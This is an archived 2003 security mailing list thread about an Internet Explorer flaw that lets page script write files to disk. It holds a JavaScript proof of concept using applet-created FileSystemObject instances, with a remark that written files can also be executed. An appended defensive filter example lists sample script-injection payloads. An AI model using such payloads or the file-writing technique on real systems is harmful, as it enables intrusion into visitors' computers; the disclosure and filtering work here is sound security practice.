Vulnerability Development mailing list archives

RE: Internet Explorer JavaScript insecure function


From: "Scovetta, Michael V" <Michael.Scovetta () ca com>
Date: Mon, 8 Dec 2003 13:58:54 -0500

This is an old exploit; google "setCLSID" and you'll see a bunch of docs
referencing this exploit. From what I gather, it's the result of some
combination of a buggy WshShell, jscript.dll, and bad Internet-Zone
security values. I believe Microsoft fixed this more than two years ago,
as per:
   http://www.microsoft.com/technet/security/bulletin/MS01-015.asp
(and probably others). If you're still using IE 5.x, you should just
upgrade. I'm sure that there are many users still using 5.x browsers, but
if you have it totally patched, this should not be exploitable.

And WriteLine is a function of the ActiveX FileSystemObject, which has
nothing to do with JavaScript -- JS only provides the ability to call
ActiveX functions.

I was unable to get this exploit to work, regardless of my security settings,
using 6.0.2800.1106.

Michael Scovetta

-----Original Message-----
From: FREEBRAIN [mailto:freebrain () unionnewbies net]
Sent: Sunday, December 07, 2003 9:57 AM
To: vuln-dev () securityfocus com
Subject: Internet Explorer JavaScript insecure function



* Internet Explorer JavaScript insecure function * 


Product: Microsoft Internet Explorer
Version: 5.x (probably other versions may be affected)


*** 


Problem: 

I discovered that a JavaScript function (interpreted by Internet Explorer) called
"file.writeline()" may be potentially dangerous for Internet Explorer users. This
function allows files to be written to the hard disk by means of JavaScript.

An attacker may use this function, writing JavaScript code in posts of forums,
guestbooks, etc., to own his victims' computers. With the "file.writeline()"
function the attacker can write trojans/viruses/etc. to his victims' hard disks;
for example, an attacker may use the JavaScript "file.writeline()" function to
write a malicious file in VBS (Visual Basic Scripting) language.

I repeat, this may be potentially dangerous for Internet Explorer users. 

NOTE: Currently a virus in the wild that affects mIRC users is using this
function ("file.writeline").

NOTE2: As you can see in the "Proof of concept", other functions are needed to
carry out an "intrusion".


*** 


Proof of concept: 

// document.applets[0] must be a (Microsoft Java VM) applet that exposes
// setCLSID() and createInstance(), i.e. one that can instantiate arbitrary COM objects.
var InterfaceObject = document.applets[0];
setTimeout("Write()", 1000);   // give the applet a second to load before using it
function Write() {
    // CLSID of Scripting.FileSystemObject (scrrun.dll)
    var fsoClassID = "{0D43FE01-F093-11CF-8940-00A0C9054228}";
    InterfaceObject.setCLSID(fsoClassID);
    var fso = InterfaceObject.createInstance();
    // windir = fso.getspecialfolder ;
    var filename = "\\proof.txt";          // "\proof.txt": root of the current drive
    var filecontent = "Hello world";
    // OpenTextFile(path, iomode, create): 2 = ForWriting, TRUE = create if missing
    var file = fso.opentextfile(filename, "2", "TRUE");
    file.writeline(filecontent);           // WriteLine is an FSO TextStream method
    file.close();
}

This code writes a file called "proof.txt" to the hard disk with the content
"Hello world". You can also execute the files you write by means of JavaScript by
adding "Run();" to the function.


*** 


Solution: 

I'm not sure about the solution, but I recommend upgrading to the latest version
of Internet Explorer. I also recommend that webmasters forbid HTML code that
contains this function in their forums, guestbooks, etc.


*** 


Thanks to: 

#disidents,#hackers,#hacker @ irc-phoenix.org 

#disidents,#sleepx,#ayuda_internet @ irc-hispano.org 

Special thanks go to: Impos, |_Tr0mP4s 

(sorry for my poor English)


*** 


By FREEBRAIN 

FREEBRAIN is a member of DisidentS Hacker Team 

http://disidents-team.cjb.net (under construction) - 
http://www.gratisweb.com/disidents 

<freebrain () unionnewbies net> ( www.unionnewbies.net )
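The original post's last recommendation, that webmasters forbid HTML containing this function, is the part a forum operator actually has to get right. The following is an added example, not code from either message in this thread, contrasting the keyword filter the post suggests with a filter that rejects every script-capable construct (script/applet/object tags, on* handlers, javascript: URLs); the sample posts are constructed for the demonstration, and the helper names are my own.

```javascript
// Added example (not from the original thread): a keyword filter for "writeline"
// versus a structural filter that blocks anything able to run script or
// instantiate a component. Sample posts below are constructed.

const samplePosts = {
  plain: "Hello, this is a normal post about <b>IE 5</b>.",
  // The PoC from the post, inlined into a <script> block inside an <applet> page.
  literal: '<applet code="x"></applet><script>f.writeline("hi")</script>',
  // Same call, with the method name assembled at runtime: no "writeline" substring.
  obfuscated: '<script>var m="write"+"line";f[m]("hi")</script>',
  // No <script> tag at all: an event handler attribute runs script just as well.
  handler: '<img src=x onerror="doWrite()">',
  // A javascript: URL in a link.
  jsurl: '<a href="javascript:run()">click</a>',
  // Tag delimiters hidden behind numeric character references.
  encoded: '&#x3c;img src=x onerror=run()&#x3e;',
};

// The kind of check the post recommends: look for the function name.
function keywordFilterFlags(html) {
  return /writeline/i.test(html);
}

// Structural check: flag every construct that can execute script or load a
// component, regardless of what the payload inside it says.
const ACTIVE_CONTENT = [
  /<\s*\/?\s*(script|applet|object|embed|iframe|frame)\b/i,
  /\son[a-z]+\s*=/i,                                        // onload=, onerror=, ...
  /(href|src|action)\s*=\s*["']?\s*(javascript|vbscript):/i, // script URLs
];

// Decode numeric character references first, since the browser will.
function decodeNumericEntities(html) {
  return html
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => String.fromCharCode(parseInt(d, 10)));
}

function activeContentFlags(html) {
  const decoded = decodeNumericEntities(html);
  return ACTIVE_CONTENT.some((re) => re.test(decoded));
}

// Run both filters over every post; returns { name: { keyword, structural } }.
function scanPosts(posts) {
  const report = {};
  for (const [name, html] of Object.entries(posts)) {
    report[name] = {
      keyword: keywordFilterFlags(html),
      structural: activeContentFlags(html),
    };
  }
  return report;
}

// Stand-alone run: show which posts each filter would have blocked.
if (typeof require !== "undefined" && require.main === module) {
  console.table(scanPosts(samplePosts));
}
```

Only the "literal" post trips the keyword filter; the other four hostile posts sail through it while the structural filter catches all of them. The practical lesson for a 2003-era guestbook is the same one that holds today: strip or escape all active content in user-supplied HTML rather than hunting for one method name.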

